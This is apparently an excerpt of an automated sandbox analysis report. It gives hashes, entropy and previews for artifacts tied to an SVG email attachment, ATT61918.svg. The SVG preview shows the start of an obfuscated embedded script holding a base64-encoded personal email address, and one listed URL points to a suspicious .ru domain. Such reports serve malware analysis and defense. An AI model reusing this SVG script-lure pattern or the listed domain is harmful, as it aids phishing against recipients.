                                                                      SHA-512:AF3D62053148D139837CA895457BEEF7620AA52614B9A08FD0D5BEF8163F4C3B9E8D7B2A74D29079DB3DACC51D98AE4A5DC19C788928E5A854D7803EBB9DED9C
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      URL:https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.js
                                                                      Preview:"use strict";(function(){function Ht(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){Ht(l,o,c,v,h,"next",s)}function h(s){Ht(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:RIFF (little-endian) data, Web/P image
                                                                      Category:downloaded
                                                                      Size (bytes):25216
                                                                      Entropy (8bit):7.947339442168474
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:F9A795E2270664A7A169C73B6D84A575
                                                                      SHA1:0FBB60AB27AB88C064EB347D0722C8ED4CF5E8B8
                                                                      SHA-256:D00203B2EEA6E418C31BAAFA949ADA5349A9F9B7E99FA003AEC7406822693740
                                                                      SHA-512:E17C8D922F52C8AB36D9C0A7DC41D32735CF1680EA653056308C6D23255FDBE40B96C68F0E7F8B3B521B6ACB080CD825F94320364B0A70141606A4449D980517
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      URL:https://jx7d.qdjcpol.ru/ijHv87UWYgy42RuFaqcJLe5KATUkReoJHNxyNcH6nNwnShBAq6J0w1wvwef209
                                                                      Preview:RIFFxb..WEBPVP8X....0...o.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.Y....'$H..xkD....oUS..[.uM....CwI.H#.H.t(..!J.AJ# .(........0.W.?D...g.6..u......}K5.>|....^..*2.....z..../.1..F..A...Vk..W.Wm?z....H+.;:...s..Z;....V.....Z.gm.......\>.}..-.....w...D.........+,K...#......._[L.[.]w1..[.l..8.....f..E...W....;....o.Q...T`.W.(..........;^........:.T..6......Yo..x.6..n.\A.5X.........J....2.O.)....0..zdL1.x.X..e?.eA.M%f.D..W.].A=6D.....w....>.*3|M.7....aEe&l.or.Tt^.*6li..lYz.HF.....2.\...U.tfQ.<ZlHB.G--....]T..h.L.U]...m....{..T{....~......K#
                                                                      File type:SVG Scalable Vector Graphics image
                                                                      Entropy (8bit):2.8204296387338177
                                                                      TrID:
                                                                      • Scalable Vector Graphics (18501/1) 78.71%
                                                                      • Generic XML (ASCII) (5005/1) 21.29%
                                                                      File name:ATT61918.svg
                                                                      File size:6'891 bytes
                                                                      MD5:b250e4389dc708b769c09aefc6066a68
                                                                      SHA1:1a985cdebc2d5ac203a4f681cb279170c666d7b1
                                                                      SHA256:50bf02e935e6754db041b9217fce6a217ae70a600650f205bf302ab9125c8982
                                                                      SHA512:8d478ca746d91a32710aa4c62ffba99dfcea68ea9c27b9b904846a8073d2f33ae5d3f88e0a6cbfe57935cdaa266c37c347eb31affc31cce0d743d14b0cd5caf7
                                                                      SSDEEP:192:x77DCZ77DCL77CD7DCZ7777sZ7777shkZZZ7CZ77kZ7777s7DZsZDZCZZZsDD7Cp:kpg
                                                                      TLSH:B3E10598E031AB1059F786A11CBB40E44B255F443904C2BD8086CFB1EB5F99782A4E0F
                                                                      File Content Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>..<svg xmlns="http://www.w3.org/2000/svg" width="400" height="250">..<script>..<![CDATA[..SyNFSxFjEHVaBU = "#bWVsYW5pZS53YWx0b25Ac3BpcmVoZWFsdGhjYXJlLmNvbQ==";..const mkGDSc={kwIzmr:"c51dcd6b614984974b
                                                                      Icon Hash:173149cccc490307